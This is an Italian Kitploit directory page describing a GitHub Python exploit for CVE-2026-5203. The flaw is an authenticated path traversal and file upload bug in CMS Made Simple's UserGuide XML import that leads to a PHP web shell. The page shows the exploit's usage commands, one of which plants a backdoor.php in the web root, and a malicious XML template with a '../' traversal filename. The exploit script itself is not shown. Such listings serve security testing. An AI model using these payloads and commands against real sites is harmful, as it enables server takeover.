Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-5203 — Exploit Python per CVE-2026-5203: path traversal autenticato e caricamento arbitrario di file in CMS Made Simple ≤ 2.22, che consente esecuzione di codice remoto tramite distribuzione di web shell PHP. | Kitploit
Strumenti/GitHubGitHub/caginkyr/cve-2026-5203
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubcaginkyr/cve-2026-5203

CVE-2026-5203

Exploit Python per CVE-2026-5203: path traversal autenticato e caricamento arbitrario di file in CMS Made Simple ≤ 2.22, che consente esecuzione di codice remoto tramite distribuzione di web shell PHP.

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-5203 — CMS Made Simple ≤ 2.2.22 RCE (Path Traversal + Upload Arbitrario di File)

CVSS Version Type

Riepilogo

La funzionalità di importazione XML del modulo UserGuide in CMS Made Simple ≤ 2.2.22 non sanifica i nomi di file forniti dall'utente, consentendo a un amministratore autenticato di caricare file arbitrari (es. web shell PHP) in qualsiasi punto del filesystem del server tramite sequenze di path traversal.

CampoValore
TipoPath Traversal / Upload Arbitrario di File → RCE
ComponenteModulo UserGuide — Importazione XML
File Affettomodules/UserGuide/lib/class.UserGuideImporterExporter.php
CVSS v3.17.2 HIGH — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Autenticazione NecessariaSì (Amministratore)

Codice Vulnerabile

root@kitploit:~
// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir    = (string) $xmlFile->isdir;   

La funzione scrive il contenuto decodificato in Base64 direttamente nel percorso controllato dall'attaccante.


Utilizzo

root@kitploit:~
python exploit.py <base_url> <admin_url> <username> <password> [upload_path]

Esempi:

root@kitploit:~
# Percorso predefinito
python exploit.py http://target.com http://target.com/admin admin password123

# Percorso di upload personalizzato
python exploit.py http://target.com http://target.com/admin admin password123 \
  ../../../../../../var/www/html/backdoor.php

La shell interattiva si avvia automaticamente se la web shell è raggiungibile dopo il caricamento.


Struttura XML Malevola

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<modulecontent>
  <module>UserGuide</module>
  <version>1.3</version>
  <files>
    <file>
      <filename>../../../webshell.php</filename>
      <isdir>0</isdir>
      <data>[BASE64_ENCODED_PHP_CODE]</data>
    </file>
  </files>
</modulecontent>

Scarica lo strumento